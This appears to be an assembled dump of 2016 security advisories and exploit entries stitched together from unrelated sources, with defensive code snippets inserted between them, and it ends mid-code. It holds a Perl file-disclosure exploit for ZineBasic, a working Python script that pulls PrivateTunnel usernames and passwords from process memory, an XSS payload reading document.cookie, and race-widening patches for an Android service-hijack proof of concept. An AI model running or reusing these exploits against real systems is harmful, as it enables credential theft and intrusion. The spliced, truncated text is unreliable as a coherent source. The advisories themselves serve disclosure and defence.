#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
=> Vulnerable snippet: $id = $_GET['id'];
----------------------------------------------------------------------------------
Exploit code with a little error in line 25 --> against script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}
Document Title:
================
SolarWinds Kiwi CatTools Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi CatTools saves you time by automating common network configuration
tasks including the ability to automatically change and backup network
device configurations. Kiwi CatTools is a software application used by
network administrators to automate many of the tasks they
perform on a daily basis. This is the no longer available freeware version.
Kiwi CatTools automates configuration backups and management on routers,
switches and firewalls. It provides e-mail notification and compare reports
highlighting config changes. Supports Telnet, SSH, TFTP and SNMP. Kiwi CatTools
is designed by network engineers, for network engineers. We understand the tasks
you need to perform and how you work. CatTools is here to make your life easier.
It does this by scheduling batch jobs, automating changes, and reporting on the
things that matter to you as a network administrator.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-cattools/product-overview.aspx
Vulnerability Information:
===========================
The application can be installed on Windows systems as a service; the service
installation is selected by default. The application is a 32-bit application and its
default installation path is "C:\Program Files (x86)" on Windows systems. Because the
service binary path is not quoted, this could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated privileges on the
system. The application runs with "Local System" privileges. A successful attempt
would require the local user to be able to insert their code in the system root path
undetected by the OS or other security applications, where it could potentially be
executed during application startup or reboot.
C:\Windows\system32>sc qc CatTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CatTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\CatTools_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CatTools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
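A check for the condition shown in the sc qc output above, added here as an example and not part of the advisory: it parses that output, flags the unquoted path, lists the locations the Service Control Manager would try first (the directories whose write ACLs need auditing), and produces the quoted binPath fix. The sample output is reconstructed from the advisory.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed from the `sc qc CatTools` output quoted in the advisory.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CatTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\CatTools3\\CatTools_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CatTools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")
_EXE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Collect the KEY : VALUE lines of `sc qc` into a dict (values may be empty)."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def split_image_path(path_name: str) -> Tuple[str, str]:
    """Split an unquoted BINARY_PATH_NAME into (executable, arguments). Assumes the
    executable ends at the first '.exe'; the SCM itself has no such knowledge."""
    m = _EXE.match(path_name)
    if not m:
        return path_name, ""
    return m.group(1), (m.group(2) or "").strip()


def is_unquoted_with_spaces(path_name: str) -> bool:
    """The vulnerable condition: no surrounding quotes and a space somewhere in
    the executable path, so CreateProcess has to guess where the path ends."""
    if not path_name or path_name.startswith('"'):
        return False
    exe, _ = split_image_path(path_name)
    return " " in exe


def search_candidates(exe: str) -> List[str]:
    """Paths CreateProcess tries, in order, for an unquoted path with spaces: the
    prefix before each space with '.exe' appended, then the full path."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def quoted_fix(path_name: str) -> str:
    """The corrected binPath value: the executable wrapped in quotes, args kept."""
    exe, args = split_image_path(path_name)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(text: str) -> Optional[Dict[str, object]]:
    """Return a finding for one `sc qc` output, or None when the path is safe."""
    fields = parse_sc_qc(text)
    path = fields.get("BINARY_PATH_NAME", "")
    if not is_unquoted_with_spaces(path):
        return None
    exe, args = split_image_path(path)
    name = fields["SERVICE_NAME"]
    tail = f" {args}" if args else ""
    return {
        "service": name,
        "runs_as": fields.get("SERVICE_START_NAME", ""),
        "candidates": search_candidates(exe),
        # sc.exe needs the inner quotes escaped when typed into cmd.exe
        "fix": f'sc config {name} binPath= "\\"{exe}\\"{tail}"',
    }


if __name__ == "__main__":
    print(audit(SC_QC_OUTPUT))
```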
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi CatTools 3.11.0
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851
This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>).
The servicemanager, when determining whether the sender of a binder transaction is authorized to register a service via SVC_MGR_ADD_SERVICE, looks up the sender's SELinux context using getpidcon(spid), where spid is the value of the sender_pid field in the binder_transaction_data that was received from the binder driver.
This is problematic because getpidcon($pid) is only safe to use if the caller either knows that the process originally referenced by $pid can't transition from zombie to dead (normally because it is the parent or ptracer of $pid) or if the caller can validate that the process referenced by $pid can not have spawned before $pid referred to the correct process based on the age of the process that $pid points to after the getpidcon() call. (The same thing applies to pretty much any API that refers to processes using PIDs.)
This means that an attacker can, at least theoretically, register arbitrary services that would normally be provided by the system_server if he can execute / cause execution of the following operations in the right order:
- The main exploit process $exploit forks, creates process $child
- $child does $binder_fd = open("/dev/binder", ...)
- $child forks, creates process $subchild
- $child exits. The binder_proc belonging to $binder_fd still holds a reference
to $child. $child transitions to zombie status.
- The exploit repeatedly forks processes that instantly die until there are no unallocated
PIDs between ns_last_pid and $child's PID.
- $subchild sends a SVC_MGR_ADD_SERVICE binder message to the service manager
- the service manager receives the binder message. The kernel fills the
sender_pid field with the result of `task_tgid_nr_ns(sender, [...])`,
where `sender` is `t->from->proc->tsk`, the task_struct of $child.
- $exploit uses `waitpid()` to transition $child from zombie to dead status
- $exploit sends a HANDLE_APPLICATION_STRICT_MODE_VIOLATION_TRANSACTION
binder message to system_server
- system_server launches a new worker thread
(in ActivityManagerService.logStrictModeViolationToDropBox)
- the service manager calls getpidcon()
- system_server's worker thread dies
As far as I can tell, this exploit approach contains the following race conditions:
- If $exploit calls waitpid() before the service manager has performed the binder
read (more accurately, before the task_tgid_nr_ns call), the service manager sees
PID 0. This race isn't hard to win, but it would help to have some primitive to either stall
the service manager after the task_tgid_nr_ns call or at least detect whether it has
performed the binder read. On older Android versions, voluntary_ctxt_switches
in /proc/$pid/status might have helped with that, but nowadays, that's blocked.
When this race condition fails, you'll get an SELinux denial with
scontext=servicemanager.
- If the service manager calls getpidcon() before the system_server has launched a
worker thread, the call will either fail (if there is no such PID) or return the
not-yet-reaped $child process. Again, having a primitive for stalling the service manager
would be useful here.
When this race condition fails, it will cause either an SELinux denial with
scontext=untrusted_app or a "failed to retrieve pid context" error from the
service manager.
- If the system_server's worker thread dies before getpidcon(), getpidcon() will fail.
To avoid this race, it would be very helpful to be able to spawn a thread in system_server
that has a controlled or at least somewhat longer lifetime.
Because of the multiple races, it is hard to hit this bug, at least without spending days on finding ways to eliminate races or widen race windows, optimizing the exploit to not cycle through the whole pid range for every attempt and so on. Because of that, I decided to run my PoC on a patched Android build (based on android-6.0.1_r46) with the following modifications to show that, while the race window is very hard to hit, there is such a race:
-------
$ repo diff
project frameworks/base/
diff --git a/services/core/java/com/android/server/am/ActivityManagerService.java b/services/core/java/com/android/server/am/ActivityManagerService.java
index 33d0a9f..371ecd7 100644
--- a/services/core/java/com/android/server/am/ActivityManagerService.java
+++ b/services/core/java/com/android/server/am/ActivityManagerService.java
@@ -12269,6 +12269,9 @@ public final class ActivityManagerService extends ActivityManagerNative
if (report.length() != 0) {
dbox.addText(dropboxTag, report);
}
+ try {
+ Thread.sleep(2000);
+ } catch (InterruptedException e) {}
}
}.start();
return;
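Review bot: the catch block swallows InterruptedException without restoring the interrupt flag (`Thread.currentThread().interrupt();`), and a fixed `Thread.sleep(2000)` in the strict-mode reporting thread is test instrumentation that widens the window described above rather than a change that could ship; label it as such in a comment so nobody reads it as a production edit.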
project frameworks/native/
diff --git a/cmds/servicemanager/service_manager.c b/cmds/servicemanager/service_manager.c
index 7fa9a39..0600eb1 100644
--- a/cmds/servicemanager/service_manager.c
+++ b/cmds/servicemanager/service_manager.c
@@ -7,6 +7,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <unistd.h>
#include <private/android_filesystem_config.h>
@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
if (!handle || (len == 0) || (len > 127))
return -1;
+ if (uid > 1000)
+ sleep(2);
+
if (!svc_can_register(s, len, spid)) {
ALOGE("add_service('%s',%x) uid=%d - PERMISSION DENIED\n",
str8(s, len), handle, uid);
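Review bot: `if (uid > 1000) sleep(2);` stalls the service manager before `svc_can_register(s, len, spid)` on every add_service from a non-system caller, which is the deliberate race-widening for this PoC but would block the single-threaded manager in a real build, so it needs a comment stating that intent; the comparison should also use `AID_SYSTEM` from the android_filesystem_config.h already included rather than the literal 1000.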
-------
These modifications widen the race windows sufficiently to be able to hit the bug with a few tries.
On the modified build, my PoC causes the following logcat output, demonstrating that the clipboard service has been replaced successfully:
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: accessFlags
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: declaringClass
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: dexFieldIndex
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: offset
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: type
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: ORDER_BY_NAME_AND_DECLARING_CLASS
06-15 21:41:00.480 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:02.900 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:04.910 992 992 E ServiceManager: SELinux: getpidcon(pid=11993) failed to retrieve pid context.
06-15 21:41:04.910 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - PERMISSION DENIED
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: pid of last try: 11993
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:11.330 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:13.340 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - ALREADY REGISTERED, OVERRIDE
(Also, to further verify the success: After running the PoC, clipboard accesses in newly spawned apps cause null reference exceptions because the PoC's binder thread has been released in the meantime.)
The issue was tested in the android emulator, with an aosp_x86_64-eng build of the patched android-6.0.1_r46 release.
I have attached the PoC apk (with native code for aarch64 and x86_64; I'm not sure whether the PoC compiles correctly for 32bit) and the Android project tree - but as mentioned earlier, note that the PoC won't work on a build without my patches. If you want to compile it yourself, first run `aarch64-linux-gnu-gcc -static -o app/src/main/jniLibs/arm64-v8a/libracer.so racer.c -Wall -std=gnu99 && gcc -static -o app/src/main/jniLibs/x86_64/libracer.so racer.c` to compile the binaries, then build the project in Android Studio.
I believe that the proper way to fix this issue would be to let the binder driver record the sender's SELinux context when a transaction is sent and then either let the recipient extract the current transaction's SELinux context via an ioctl or store the SELinux context in the binder message. PIDs should not be used during the SELinux context lookup.
Regarding impact:
It looks as if the vulnerable code in the service manager is reachable from isolated_app context, although being isolated is probably going to make it even more difficult to trigger the bug.
After a service is replaced, already-running code should usually continue to use the old service because that reference is cached.
If there is e.g. some system_app that performs permissions checks (which use the "permission" service), it might be possible to bypass such permission checks using this bug, by replacing the real permission service with one that always grants access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=850
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a multitude of bugs in the handling of JPEG2000 images embedded in a custom record 0x8000 inside EMF, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
The CTPViewDoc::WriteEMF function (address 0x100518F0) iterates over all EMF records found in the EMFSPOOL structure sent over COM1 for printing, and performs special handling of some of them. One such record is a custom type 0x8000, expected to store a JPEG2000 image wrapped in a structure similar to that of an EMF_STRETCHDIBITS record. The handler at 0x100516A0, and more specifically a further nested function at 0x1003C000, performs complete parsing of the J2K format, opening up the potential for software vulnerabilities. An example of a bug in that code area discovered in the past is a stack-based buffer overflow in the processing of record 0xff5c (Quantization Default), reported by Kostya Kortchinsky in bug #287.
Since the source code of the JPEG2000 implementation used by VMware is not publicly available, and the file format is sufficiently complex that a manual audit sounds like a dire and very ineffective option to find bugs, I have set up a fuzzing session to automate the process. As a result, with the PageHeap option enabled in Application Verifier for vprintproxy.exe, the fuzzer has managed to trigger hundreds of crashes, in a total of 39 unique code locations. Below is a list of different instructions which generated a crash, with a brief description of the underlying reason.
+----------------------------+-----------------------------------------------+
| Instruction | Reason |
+----------------------------+-----------------------------------------------+
| add [eax+edx*4], edi | Heap buffer overflow |
| cmp [eax+0x440], ebx | Heap out-of-bounds read |
| cmp [eax+0x8], esi | Heap out-of-bounds read |
| cmp [edi+0x70], ebx | Heap out-of-bounds read |
| cmp [edi], edx | Heap out-of-bounds read |
| cmp dword [eax+ebx*4], 0x0 | Heap out-of-bounds read |
| cmp dword [esi+eax*4], 0x0 | Heap out-of-bounds read |
| div dword [ebp-0x24] | Division by zero |
| div dword [ebp-0x28] | Division by zero |
| fld dword [edi] | NULL pointer dereference |
| idiv ebx | Division by zero |
| idiv edi | Division by zero |
| imul ebx, [edx+eax+0x468] | Heap out-of-bounds read |
| mov [eax-0x4], edx | Heap buffer overflow |
| mov [ebx+edx*8], eax | Heap buffer overflow |
| mov [ecx+edx], eax | Heap buffer overflow |
| mov al, [esi] | Heap out-of-bounds read |
| mov bx, [eax] | NULL pointer dereference |
| mov eax, [ecx] | NULL pointer dereference |
| mov eax, [edi+ecx+0x7c] | Heap out-of-bounds read |
| mov eax, [edx+0x7c] | Heap out-of-bounds read |
| movdqa [edi], xmm0 | Heap buffer overflow |
| movq mm0, [eax] | NULL pointer dereference |
| movq mm1, [ebx] | NULL pointer dereference |
| movq mm2, [edx] | NULL pointer dereference |
| movzx eax, byte [ecx-0x1] | Heap out-of-bounds read |
| movzx eax, byte [edx-0x1] | Heap out-of-bounds read |
| movzx ebx, byte [eax+ecx] | Heap out-of-bounds read |
| movzx ecx, byte [esi+0x1] | Heap out-of-bounds read |
| movzx ecx, byte [esi] | Heap out-of-bounds read |
| movzx edi, word [ecx] | NULL pointer dereference |
| movzx esi, word [edx] | NULL pointer dereference |
| push dword [ebp-0x8] | Stack overflow (deep / infinite recursion) |
| push ebp | Stack overflow (deep / infinite recursion) |
| push ebx | Stack overflow (deep / infinite recursion) |
| push ecx | Stack overflow (deep / infinite recursion) |
| push edi | Stack overflow (deep / infinite recursion) |
| push esi | Stack overflow (deep / infinite recursion) |
| rep movsd | Heap buffer overflow, Heap out-of-bounds read |
+----------------------------+-----------------------------------------------+
Considering the volume of the crashes, I don't have the resources to investigate the root cause of each of them, and potentially deduplicate the list even further. My gut feeling is that the entirety of the crashes may represent 10 or more different bugs in the code.
Attached is a Python script which can be used to test each particular JPEG2000 sample: it is responsible for wrapping it in the corresponding EMF + EMFSPOOL structures and sending it to the COM1 serial port on the guest system. It is a reworked version of Kostya's original exploit from bug #287. In the same ZIP archive, you can also find up to three samples per crash site listed above.
It was empirically confirmed that some of the heap corruptions can be leveraged to achieve arbitrary code execution, as when the Page Heap mechanism was disabled, the process would occasionally crash at invalid EIP or a CALL instruction referencing invalid memory addresses (vtables).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip
#####
# PrivateTunnel Client v2.7.0 (x64) Local Credentials Disclosure After Sign out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.privatetunnel.com
# Date 14/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
#####
# PrivateTunnel Client v2.7.0 is vulnerable to local credentials disclosure after the user has logged out.
# PrivateTunnel keeps the supplied credentials in plaintext in the process memory while the user is logged in and after sign out.
# A potential attacker could read the username and password from process memory in order to gain access to the PrivateTunnel account.
#
# The authors are not responsible for any misuse or damage caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
from winappdbg import Debug, Process
usr = ''
pwd = ''
found = 0
filename = "privatetunnel2.7.0.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "###########################################################################"
print "# PrivateTunnel v2.7.0 Local Credentials Disclosure Exploit After Sign out#"
print "#\t\tBug Discovery by Yakir Wizman, Victor Minin\t\t #"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t #"
print "#\t\t\tPlease use responsibly.\t\t\t\t #"
print "###########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid != 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A'
for address in process.search_regexp(user_pattern):
memory_dump.append(address)
try:
usr = memory_dump[0][2].split('"username" : "')[1].replace('"\n', '')
pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0]
except:
pass
print ""
if usr != '' and pwd !='':
found = 1
print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of resources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a resource, the injected code gets executed in the context of a user viewing the appointment details.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub Żoczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected into HTML e-mail hyperlinks by using the "data" scheme. This method bypasses the existing sanitization methods. As a result, the script code gets injected into hyperlinks displayed in the OX App Suite UI.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose a malicious mail with a link using the "data" scheme with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not open or interact with mails from untrusted external sources. Targets of hyperlinks should be examined before clicking the respective link. Operators should update to the latest Patch Release.
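The class of check the "data" scheme bypass above calls for, as an added example (not the OX App Suite sanitizer): an allow-list of link schemes applied after the normalisation browsers perform, so a blocked scheme cannot be smuggled past the check with upper-case letters or embedded whitespace. The regex-based rewrite of the HTML fragment is a simplification for the demonstration.

```python
import html
import re
from typing import Optional

ALLOWED_SCHEMES = {"http", "https", "mailto"}  # allow-list, not a block-list

# Browsers drop leading/trailing C0 controls and spaces and ignore tab/CR/LF
# anywhere in a URL before parsing the scheme, so the check must do the same.
_EDGE_JUNK = "".join(chr(c) for c in range(0x21))
_INNER_JUNK = re.compile(r"[\t\r\n]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
_HREF = re.compile(r'(href\s*=\s*)"([^"]*)"', re.IGNORECASE)


def safe_href(href: str) -> Optional[str]:
    """Return the (already entity-decoded) href when its scheme is allow-listed
    or the link is relative; return None for data:, javascript:, vbscript:, ..."""
    value = _INNER_JUNK.sub("", href.strip(_EDGE_JUNK))
    m = _SCHEME.match(value)
    if m is None:
        return value  # relative URL: no scheme to abuse
    return value if m.group(1).lower() in ALLOWED_SCHEMES else None


def neutralise_links(fragment: str) -> str:
    """Rewrite every double-quoted href in an HTML fragment whose target fails
    safe_href() to '#'. A production sanitizer should walk the parsed DOM
    instead of the raw markup; the regex pass is enough for this demonstration."""
    def repl(m: "re.Match[str]") -> str:
        target = safe_href(html.unescape(m.group(2)))
        if target is None:
            return m.group(1) + '"#"'
        return m.group(1) + '"' + html.escape(target, quote=True) + '"'
    return _HREF.sub(repl, fragment)


if __name__ == "__main__":
    # The proof-of-concept link from the advisory, run through the rewrite.
    poc = '<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>'
    print(neutralise_links(poc))
```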
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored in the temporary storage for inline images in HTML e-mails. The content is available to the user who stored it, but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regularly refreshed. An attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. an SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user already has an active session on the same domain.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
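The five advisories above all route an untrusted string into the browser: a mail hyperlink with a data: scheme, an inline PGP-signed body, a PGP key name, and the guest reader's "templid" parameter. The allow-list sanitizer below is an added example of the defensive pattern, not OX Software's fix; the scheme and tag allow-lists are assumptions chosen for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

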